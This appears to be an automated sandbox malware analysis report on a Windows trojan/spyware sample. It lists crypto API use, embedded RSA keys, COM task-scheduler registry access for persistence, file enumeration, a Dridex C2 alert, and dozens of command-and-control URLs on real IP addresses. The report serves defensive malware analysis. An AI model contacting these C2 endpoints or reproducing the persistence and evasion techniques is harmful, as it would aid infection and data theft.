Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:575186
Start time:11:04:14
Joe Sandbox Product:Cloud
Start date:05.06.2018
Overall analysis duration:0h 21m 15s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ucD6u0vstJ.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.troj.spyw.evad.winEXE@10/16@2/5
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 119
  • Number of non-executed functions: 163
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, WmiPrvSE.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Report size getting too big, too many NtWriteVirtualMemory calls found.

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D5853 CryptStringToBinaryA,2_2_003D5853
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D3933 CryptStringToBinaryA,2_2_003D3933
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003DF261 CryptStringToBinaryA,2_2_003DF261
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CBA40 CryptStringToBinaryW,CryptStringToBinaryW,2_2_003CBA40
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,2_2_003C76E0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CF720 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,2_2_003CF720
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003CF310 CryptBinaryToStringW,CryptBinaryToStringW,2_2_003CF310
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003DEF6B CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,memcpy,CryptDestroyKey,CryptReleaseContext,2_2_003DEF6B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003D3BB7 CryptAcquireContextA,CryptEncrypt,CryptDestroyKey,CryptImportKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,2_2_003D3BB7
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003976E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,4_2_003976E0
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_0039F720 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,4_2_0039F720
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A5853 CryptStringToBinaryA,4_2_003A5853
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A3933 CryptStringToBinaryA,4_2_003A3933
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003AF261 CryptStringToBinaryA,4_2_003AF261
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_0039BA40 CryptStringToBinaryW,CryptStringToBinaryW,4_2_0039BA40
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_0039F310 CryptBinaryToStringW,CryptBinaryToStringW,4_2_0039F310
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003AEF6B CryptAcquireContextA,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,memcpy,CryptDestroyKey,CryptReleaseContext,4_2_003AEF6B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_003A3BB7 CryptAcquireContextA,CryptEncrypt,CryptDestroyKey,CryptImportKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,4_2_003A3BB7
Public key (encryption) foundShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: -----BEGIN RSA PUBLIC KEY-----2_2_003D556B
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: -----BEGIN RSA PUBLIC KEY-----2_2_003D528D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: -----BEGIN RSA PUBLIC KEY-----2_2_003D528D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: -----BEGIN RSA PUBLIC KEY-----2_2_003D528D
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: -----BEGIN RSA PUBLIC KEY-----2_2_003D528D
Source: ucE7u0vttK.exeBinary or memory string: -----BEGIN RSA PUBLIC KEY-----

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgIDJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgIDJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgidJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003C2450 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,2_2_003C2450
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 4_2_00392450 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,4_2_00392450

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) 94.250.254.22:447 -> 192.168.1.16:49192
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49190 -> 185.42.192.194:449
Source: global trafficTCP traffic: 192.168.1.16:49192 -> 94.250.254.22:447
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: checkip.amazonaws.com
Source: unknownDNS query: name: checkip.amazonaws.com
Source: unknownDNS query: name: checkip.amazonaws.com
Source: unknownDNS query: name: checkip.amazonaws.com
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: checkip.amazonaws.com
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exeCode function: 2_2_003DF4EF recv,recv,2_2_003DF4EF
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: checkip.amazonaws.com
Found strings which match to known social media urlsShow sources
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: checkip.amazonaws.com
Urls found in memory or binary dataShow sources
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response.php
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response_new.php?g=6c7bb097bbbfc
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response_new.php?g=6c7bb097bbbfc7b73a0533174839099c09cf4c83d82f39035c28613e91d
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response_new.php?g=79cebc0e481a73be81f063ceedbcee63ea6fc780eaf5bcaf1824e0bdc5b
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response_new.php?g=8a2bdf6b11570fd3c0f9686ab79683e0e30fcd32420177430b26a645aa8
Source: ucE7u0vttK.exe, 00000004.00000002.14089625838.01B0E000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response_new.php?g=ba080a031d4bab597d72c1bb141d96b057cfebfc7dda41e054843f9e775
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: http://185.251.39.247/response_new.php?p=0ddfc0ceff46d881d8b8ce9888bb8e5069a4adbafaf63340104c55336b8
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: http://185.68.93.49/img/gate.php
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmp, ucE7u0vttK.exe, 00000004.00000002.14089392697.01A80000.00000004.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ucE7u0vttK.exe, 00000004.00000003.12999966862.01AEB000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?589cc746691ee
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enab
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: ucE7u0vttK.exe, 00000004.00000002.14087217958.0032A000.00000004.sdmpString found in binary or memory: http://www.usertrust.com1
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:443/getq/002
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:443/login/2
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:443/rcrd/2
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:443/snapshoot/2
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527161983056830&id=5C7f1FC12KF1AAX8Zirq
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162060949058&id=3B3KQLiT0DprX1yB6BDr
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162060949058&id=Je7F3VX5dFJd9ZqYrqvE
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162060949058&id=gJCCGNsL4DLksZuC0fsa
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162060949058&id=pJaHwVQsdwHRM1y36AJ4
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162392678761&id=lmTkqQiUCKZ1O6tcTRTq
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162502077171&id=ASDNAbIrwUtQyXA8X5NC
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162502077171&id=GmCSTrBrKZIIWXrfjSR9
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162502077171&id=tbaqJQEVP5xSyE6Y07vT
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162575196753&id=imqNlNm1MqMiONCtI00m
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162620975004&id=KMRvQD4SEufyd8nM2jV5
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162953804588&id=DJoC8JimUjCxqAOFcN7J
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527162953804588&id=doijGMagBzHiKrRd9DV7
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163053741552&id=NGt45bfizPmxbvs2wNtK
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163053741552&id=SacYJzPiv0BMbHFS4UST
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163053741552&id=oOBSZuv2F6PfkOnAfYPT
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163250593036&id=6YGs0UVkoSlQslHr0GaZ
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163250593036&id=Vajrqk2wcGOau1iIAdzJ
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163250593036&id=YpF584AAfknX7Qonrrqi
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163250593036&id=e3EOKPM7lgouZdnz5sSB
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527163250593036&id=zyxycUtm4VBP5PsLbnY5
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164097084304&id=0V1NHnPTbFyngpTqBTDa
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164097084304&id=APekG7FGr3Nl2XitJ8C5
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164097084304&id=FunTAcx0S6zY1r7PEQcg
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164097084304&id=LsjvE4FIQfbWDGH7Ky5P
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164097084304&id=Xppm0baJgXBv8b9BI9aq
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164139852253&id=IuyzayVlYhUJFU7H2tSZ
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164275923785&id=X6ZnIhbHxLzzscwO5MXb
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164294934631&id=BGw4aCGJ773IeIlpOhyP
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164442360306&id=iap1wed1IKRq6nwSbQ5v
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164640571442&id=CdzV979CKMW8CcCmzsmM
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164640571442&id=OWwCXSb3W0wSaRGrxQ0N
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164640571442&id=emv4IGtOW6xkLvM61aD8
Source: ucE7u0vttK.exe, 00000004.00000003.13183440428.01B49000.00000004.sdmpString found in binary or memory: https://185.251.39.247:446/response.php?s=1527164640571442&id=j2m28ycqMHuiqj0owGDH
